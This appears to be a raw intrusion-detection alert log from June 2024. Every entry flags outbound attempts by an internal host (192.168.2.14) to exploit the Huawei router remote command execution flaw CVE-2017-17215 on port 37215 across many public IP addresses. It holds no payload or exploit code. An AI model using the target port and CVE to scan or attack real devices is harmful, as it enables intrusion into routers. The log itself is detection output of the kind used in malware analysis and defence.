                                            06/14/24-10:44:33.134003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505437215192.168.2.1441.7.38.17
                                            06/14/24-10:43:41.848595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124037215192.168.2.14197.211.172.30
                                            06/14/24-10:43:36.722507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454237215192.168.2.14197.182.25.170
                                            06/14/24-10:43:48.018051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4919237215192.168.2.14156.9.221.172
                                            06/14/24-10:44:22.858558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258837215192.168.2.14197.87.87.189
                                            06/14/24-10:44:24.917438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971637215192.168.2.14197.135.35.201
                                            06/14/24-10:44:29.023910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471237215192.168.2.14197.31.97.183
                                            06/14/24-10:43:43.941366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604637215192.168.2.1441.26.113.234
                                            06/14/24-10:44:18.766660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823437215192.168.2.14197.96.181.93
                                            06/14/24-10:43:34.677223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029037215192.168.2.1441.212.57.218
                                            06/14/24-10:44:24.915980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623437215192.168.2.1441.120.177.209
                                            06/14/24-10:44:26.985821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809637215192.168.2.14197.148.138.163
                                            06/14/24-10:44:14.671405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507637215192.168.2.14156.211.184.194
                                            06/14/24-10:44:29.012895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224037215192.168.2.14197.68.148.58
                                            06/14/24-10:43:58.274168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903437215192.168.2.14156.18.249.33
                                            06/14/24-10:44:00.339034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14156.72.183.252
                                            06/14/24-10:43:52.149713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289837215192.168.2.14156.66.75.211
                                            06/14/24-10:44:18.775566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597837215192.168.2.14197.117.129.16
                                            06/14/24-10:43:56.245432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105237215192.168.2.1441.77.177.177
                                            06/14/24-10:44:02.381791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576237215192.168.2.14197.207.24.1
                                            06/14/24-10:44:06.451018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397037215192.168.2.14197.21.107.108
                                            06/14/24-10:44:20.807074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681637215192.168.2.14197.121.255.216
                                            06/14/24-10:44:26.978113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719637215192.168.2.1441.205.197.188
                                            06/14/24-10:43:56.227184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200237215192.168.2.14156.86.166.177
                                            06/14/24-10:43:41.896328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203037215192.168.2.14197.254.137.241
                                            06/14/24-10:44:16.735273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.1441.175.192.232
                                            06/14/24-10:44:02.384380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480637215192.168.2.1441.163.187.34
                                            06/14/24-10:43:50.075299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057237215192.168.2.14197.94.112.247
                                            06/14/24-10:43:34.677689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146837215192.168.2.14156.198.108.43
                                            06/14/24-10:43:52.149252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860437215192.168.2.14156.29.158.134
                                            06/14/24-10:44:18.779137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655637215192.168.2.1441.109.120.194
                                            06/14/24-10:44:20.804723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291437215192.168.2.14156.206.123.134
                                            06/14/24-10:43:43.970816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518037215192.168.2.14197.217.13.144
                                            06/14/24-10:43:56.226953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021237215192.168.2.14156.174.80.199
                                            06/14/24-10:44:04.404738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5435437215192.168.2.1441.158.205.85
                                            06/14/24-10:44:22.882201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845437215192.168.2.1441.92.23.88
                                            06/14/24-10:43:45.968185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136437215192.168.2.14156.16.131.101
                                            06/14/24-10:44:14.681251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527437215192.168.2.14156.219.24.245
                                            06/14/24-10:43:45.968926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000837215192.168.2.1441.154.28.210
                                            06/14/24-10:43:54.182621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931837215192.168.2.14197.170.235.112
                                            06/14/24-10:44:08.519463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041237215192.168.2.14156.145.190.158
                                            06/14/24-10:44:06.452242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605037215192.168.2.14197.127.230.11
                                            06/14/24-10:43:34.663450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823637215192.168.2.14156.235.113.156
                                            06/14/24-10:43:45.967482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523837215192.168.2.14197.17.186.7
                                            06/14/24-10:44:10.546178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5342037215192.168.2.14197.245.58.109
                                            06/14/24-10:43:54.200501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165837215192.168.2.14197.117.171.250
                                            06/14/24-10:43:43.943785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905437215192.168.2.14156.102.200.202
                                            06/14/24-10:44:14.682748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349637215192.168.2.14197.39.158.207
                                            06/14/24-10:43:39.790738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914637215192.168.2.14197.204.104.170
                                            06/14/24-10:43:43.942355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411837215192.168.2.14197.238.128.19
                                            06/14/24-10:44:24.916526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739637215192.168.2.14197.20.15.226
                                            06/14/24-10:43:43.944695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903237215192.168.2.14197.48.174.91
                                            06/14/24-10:44:02.365918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045837215192.168.2.1441.122.66.248
                                            06/14/24-10:43:34.676103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935237215192.168.2.14156.150.23.167
                                            06/14/24-10:44:22.878341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006637215192.168.2.1441.86.193.99
                                            06/14/24-10:44:33.149406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016237215192.168.2.1441.206.15.215
                                            06/14/24-10:44:22.860883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323837215192.168.2.1441.246.218.249
                                            06/14/24-10:43:56.253873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763037215192.168.2.14156.253.202.25
                                            06/14/24-10:44:06.471469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636037215192.168.2.14156.171.28.182
                                            06/14/24-10:44:04.421646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628837215192.168.2.14156.29.56.135
                                            06/14/24-10:43:39.811425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884437215192.168.2.1441.232.229.67
                                            06/14/24-10:43:34.677158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918437215192.168.2.14197.240.94.26
                                            06/14/24-10:44:08.517229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072637215192.168.2.14197.174.124.4
                                            06/14/24-10:43:58.276609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326237215192.168.2.14156.51.114.128
                                            06/14/24-10:43:58.275018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662837215192.168.2.14197.71.91.73
                                            06/14/24-10:44:06.470931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488037215192.168.2.14156.156.53.220
                                            06/14/24-10:43:34.662387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305837215192.168.2.14156.173.40.172
                                            06/14/24-10:43:34.662615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360237215192.168.2.14156.72.192.166
                                            06/14/24-10:43:39.790579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118237215192.168.2.14156.218.56.86
                                            06/14/24-10:44:24.914870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811037215192.168.2.14156.251.224.182
                                            06/14/24-10:44:10.545536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487837215192.168.2.14156.66.100.234
                                            06/14/24-10:43:52.146945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382037215192.168.2.14156.90.35.238
                                            06/14/24-10:43:48.021720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4656637215192.168.2.14197.168.9.24
                                            06/14/24-10:44:35.177181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606837215192.168.2.1441.47.61.116
                                            06/14/24-10:44:29.022456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301637215192.168.2.14156.204.63.78
                                            06/14/24-10:44:31.050659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494637215192.168.2.14156.240.225.231
                                            06/14/24-10:43:43.972546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708437215192.168.2.14156.33.138.240
                                            06/14/24-10:43:58.277939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031837215192.168.2.14197.136.102.70
                                            06/14/24-10:44:18.775462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211837215192.168.2.14197.195.54.196
                                            06/14/24-10:43:41.902300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111237215192.168.2.14156.242.150.91
                                            06/14/24-10:44:10.542708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129037215192.168.2.14156.16.132.2
                                            06/14/24-10:44:31.091447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153237215192.168.2.14197.219.222.35
                                            06/14/24-10:43:34.675323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934637215192.168.2.1441.225.163.169
                                            06/14/24-10:43:50.111593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483037215192.168.2.14197.125.140.178
                                            06/14/24-10:44:14.681847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414037215192.168.2.1441.137.74.82
                                            06/14/24-10:43:37.761950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070237215192.168.2.14156.150.62.189
                                            06/14/24-10:44:02.383378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422437215192.168.2.14197.174.169.35
                                            06/14/24-10:44:12.614330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4914837215192.168.2.1441.56.20.119
                                            06/14/24-10:44:31.057382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777837215192.168.2.14156.193.174.24
                                            06/14/24-10:43:50.115248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746037215192.168.2.14156.116.143.87
                                            06/14/24-10:44:22.879182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660837215192.168.2.1441.14.222.249
                                            06/14/24-10:43:48.020534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383837215192.168.2.1441.104.109.220
                                            06/14/24-10:44:02.382843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847837215192.168.2.1441.112.60.36
                                            06/14/24-10:44:00.342802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.14197.251.60.209
                                            06/14/24-10:44:24.934539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5477237215192.168.2.1441.209.8.162
                                            06/14/24-10:44:31.051652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973237215192.168.2.14197.7.130.42
                                            06/14/24-10:44:22.881625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840237215192.168.2.14156.202.21.10
                                            06/14/24-10:44:20.829455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326437215192.168.2.1441.235.196.224
                                            06/14/24-10:43:45.966127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.14197.231.60.18
                                            06/14/24-10:44:12.616654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874237215192.168.2.14197.240.152.18
                                            06/14/24-10:44:16.715309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744037215192.168.2.14197.78.101.115
                                            06/14/24-10:44:04.423682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691637215192.168.2.14197.115.103.36
                                            06/14/24-10:43:58.277786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5493437215192.168.2.1441.12.244.238
                                            06/14/24-10:44:10.543335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043637215192.168.2.14156.250.157.166
                                            06/14/24-10:44:08.504636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646037215192.168.2.1441.3.31.12
                                            06/14/24-10:43:54.186090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558037215192.168.2.14197.135.179.153
                                            06/14/24-10:44:18.765617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736637215192.168.2.1441.87.70.158
                                            06/14/24-10:43:54.184513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232637215192.168.2.1441.223.53.30
                                            06/14/24-10:44:35.178242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113437215192.168.2.14197.105.79.179
                                            06/14/24-10:44:14.670880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669037215192.168.2.1441.111.29.174
                                            06/14/24-10:44:04.411603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175837215192.168.2.14197.89.162.195
                                            06/14/24-10:44:26.976856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299637215192.168.2.14156.80.117.70
                                            06/14/24-10:44:04.421174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912237215192.168.2.1441.186.254.91
                                            06/14/24-10:44:10.569524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306637215192.168.2.1441.229.90.81
                                            06/14/24-10:44:35.177088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029637215192.168.2.14197.73.187.37
                                            06/14/24-10:44:33.152634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740237215192.168.2.14156.212.145.228
                                            06/14/24-10:44:12.616454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166237215192.168.2.14197.74.221.176
                                            06/14/24-10:44:10.542634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427037215192.168.2.14197.101.18.62
                                            06/14/24-10:44:29.023680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683037215192.168.2.14197.23.228.170
                                            06/14/24-10:43:43.944661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093237215192.168.2.14197.90.195.108
                                            06/14/24-10:43:37.762013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137237215192.168.2.1441.152.88.10
                                            06/14/24-10:44:31.051814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.14156.218.30.134
                                            06/14/24-10:44:10.568859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729037215192.168.2.14197.47.138.73
                                            06/14/24-10:44:24.914690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680437215192.168.2.1441.195.1.51
                                            06/14/24-10:43:43.970844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716437215192.168.2.14156.156.48.177
                                            06/14/24-10:44:04.423369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414837215192.168.2.14197.32.31.254
                                            06/14/24-10:43:48.031536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602037215192.168.2.14156.213.243.189
                                            06/14/24-10:43:48.018435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853637215192.168.2.1441.136.9.74
                                            06/14/24-10:44:00.325945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713637215192.168.2.1441.57.15.216
                                            06/14/24-10:44:20.807252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065837215192.168.2.14197.214.220.216
                                            06/14/24-10:43:52.143672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836637215192.168.2.14156.199.172.160
                                            06/14/24-10:44:24.914236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4305237215192.168.2.14197.218.81.90
                                            06/14/24-10:43:48.027816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917837215192.168.2.14197.122.38.62
                                            06/14/24-10:44:33.135133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469637215192.168.2.14197.50.66.247
                                            06/14/24-10:43:52.148717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701837215192.168.2.1441.205.95.67
                                            06/14/24-10:43:39.809181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4522237215192.168.2.14197.124.88.133
                                            06/14/24-10:44:10.547197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927037215192.168.2.1441.238.45.145
                                            06/14/24-10:44:18.761552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403037215192.168.2.14156.49.132.45
                                            06/14/24-10:44:04.409031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404437215192.168.2.14197.181.22.60
                                            06/14/24-10:44:18.763946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366237215192.168.2.1441.243.141.246
                                            06/14/24-10:43:48.019359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506837215192.168.2.1441.224.156.97
                                            06/14/24-10:43:54.202178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561037215192.168.2.14156.118.233.145
                                            06/14/24-10:43:45.985305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602837215192.168.2.14197.10.122.243
                                            06/14/24-10:44:04.411116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555837215192.168.2.1441.100.77.179
                                            06/14/24-10:44:06.451912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918037215192.168.2.14197.175.223.174
                                            06/14/24-10:44:12.646579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429037215192.168.2.1441.101.107.149
                                            06/14/24-10:44:14.686462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651237215192.168.2.14197.62.221.220
                                            06/14/24-10:43:36.724756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.1441.105.239.212
                                            06/14/24-10:44:24.944731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263837215192.168.2.14197.239.204.169
                                            06/14/24-10:43:36.701740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5298437215192.168.2.14156.95.70.142
                                            06/14/24-10:43:36.717805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131637215192.168.2.14156.240.147.158
                                            06/14/24-10:44:22.860490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392237215192.168.2.14156.84.184.32
                                            06/14/24-10:44:08.518061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5525837215192.168.2.14156.36.141.114
                                            06/14/24-10:43:34.676197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698437215192.168.2.14197.111.198.15
                                            06/14/24-10:44:06.471997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564237215192.168.2.1441.82.230.165
                                            06/14/24-10:44:00.338883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528037215192.168.2.14197.247.108.202
                                            06/14/24-10:44:29.027242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574437215192.168.2.14156.109.31.91
                                            06/14/24-10:43:43.944298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680237215192.168.2.14197.167.218.80
                                            06/14/24-10:44:06.472851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557637215192.168.2.14197.196.156.208
                                            06/14/24-10:44:31.086204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785037215192.168.2.14197.64.12.171
                                            06/14/24-10:43:34.663064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243637215192.168.2.14197.42.188.77
                                            06/14/24-10:44:29.014982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040437215192.168.2.14197.26.85.118
                                            06/14/24-10:44:00.325491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4879637215192.168.2.14197.199.247.33
                                            06/14/24-10:44:24.947242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115237215192.168.2.1441.245.25.198
                                            06/14/24-10:44:14.689000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886437215192.168.2.14197.24.74.55
                                            06/14/24-10:44:31.057633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262837215192.168.2.14197.205.217.129
                                            06/14/24-10:44:18.765422TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434237215192.168.2.14197.150.182.128
                                            06/14/24-10:43:56.253528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399037215192.168.2.14156.82.185.196
                                            06/14/24-10:43:45.989628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167637215192.168.2.1441.99.41.77
                                            06/14/24-10:44:12.625432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906637215192.168.2.14197.211.38.117
                                            06/14/24-10:43:50.073269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14156.153.15.116
                                            06/14/24-10:43:41.846759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727837215192.168.2.14197.55.73.26
                                            06/14/24-10:43:56.226096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111837215192.168.2.14197.187.74.179
                                            06/14/24-10:43:52.161634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.14197.223.161.32
                                            06/14/24-10:44:33.149140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389437215192.168.2.1441.0.175.187
                                            06/14/24-10:44:14.668528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765037215192.168.2.1441.127.197.120
                                            06/14/24-10:44:20.828866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3895637215192.168.2.14197.18.252.103
                                            06/14/24-10:44:00.343565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832437215192.168.2.14197.156.126.136
                                            06/14/24-10:44:24.917863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684037215192.168.2.1441.10.207.10
                                            06/14/24-10:44:35.181349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080637215192.168.2.14197.35.251.69
                                            06/14/24-10:43:56.243084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346837215192.168.2.14156.249.23.109
                                            06/14/24-10:44:29.024676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028837215192.168.2.14156.49.191.111
                                            06/14/24-10:44:33.131805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280637215192.168.2.1441.53.7.93
                                            06/14/24-10:44:12.618164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920037215192.168.2.14197.221.203.189
                                            06/14/24-10:43:50.115898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976237215192.168.2.1441.162.237.177
                                            06/14/24-10:44:00.322288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541037215192.168.2.14197.178.174.72
                                            06/14/24-10:43:43.968803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14197.71.90.253
                                            06/14/24-10:44:31.056030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420437215192.168.2.14197.119.238.117
